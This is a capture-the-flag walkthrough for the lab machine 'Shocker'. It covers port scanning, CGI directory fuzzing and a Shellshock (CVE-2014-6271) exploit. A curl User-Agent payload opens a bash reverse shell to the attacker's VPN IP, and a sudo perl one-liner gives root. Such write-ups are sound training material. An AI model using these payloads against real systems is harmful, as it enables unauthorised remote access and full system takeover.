Explore the fundamentals of cybersecurity in the Shocker Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.10.56 shocker.htb

Script to add hosts automatically#

ip="10.10.10.56"
domain="shocker.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV shocker.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 21:03 CEST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-6271 (Shellshock)#

Directory Bruteforcing with dirb#

First, run dirb to scan for directories on the target:

dirb http://shocker.htb/

You will find the cgi-bin directory.

Fuzzing for Shellshock Vulnerable Scripts#

Use ffuf to fuzz for potential vulnerable .sh scripts inside the cgi-bin directory:

ffuf -u http://shocker.htb/cgi-bin/FUZZ.sh -c -w /usr/share/dirb/wordlists/small.txt

Exploiting CVE-2014-6271 (Shellshock)#

Set up a listener to catch the reverse shell:

nc -lvnp 9001

Then, use curl to exploit the Shellshock vulnerability by sending a malicious User-Agent header:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

curl -H "User-Agent: () { :;}; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1'" http://shocker.htb/cgi-bin/user.sh

Accessing the Target System#

Once you recive the reverse shell, you can access files like:

cat /home/shelly/user.txt

Escalating Privileges with Sudo#

Check for sudo permissions:

sudo -l

If you see the following entry:

(root) NOPASSWD: /usr/bin/perl

You can escalate privileges by running:

sudo perl -e 'exec "/bin/bash";'

This will give you a root shell.

cat /root/root.txt